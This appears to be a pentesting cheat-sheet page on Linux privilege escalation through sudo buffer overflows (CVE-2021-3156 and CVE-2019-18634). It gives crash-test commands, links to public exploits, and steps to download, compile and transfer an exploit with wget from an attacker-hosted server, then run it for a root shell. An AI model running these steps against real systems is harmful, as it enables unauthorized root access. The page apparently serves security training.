Buffer Overflow Privilege Escalation
Last modified: 2024-06-27
Buffer overflow in Linux might be vulnerable to privilege escalation (PrivEsc).
Baron Samedit (Heap Buffer Overflow) CVE-2021-3156
1. Check Vulnerability to Overwrite Heap Buffer in Target Machine
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted
2. Proof of Concept
There are various PoC online.
- https://github.com/lockedbyte/CVE-Exploits/tree/master/CVE-2021-3156.
- https://github.com/blasty/CVE-2021-3156
Pwfeedback
1. Check Enabling the Pwfeedback in /etc/sudoers
If so, when running sudo command and inputting password, asterisk will be displayed.
You can make it the buffer overflow.
cat /etc/sudoers
# -------------------------------------------
...
Defaults pwfeadback
...
2. Input Long String to Password
perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
# [sudo] password: Segmentation fault
3. Download a Payload and Compile in Local Machine
wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
gcc -o exploit exploit.c
4. Transfer the Payload to Remote Machine
# In local machine
python3 -m http.server 8000
# In remote machine
wget http://<local-ip>:8000/exploit
5. Execute the Payload in Remote Machine
After that, you'll get a root shell.
chmod 700 ./exploit
./exploit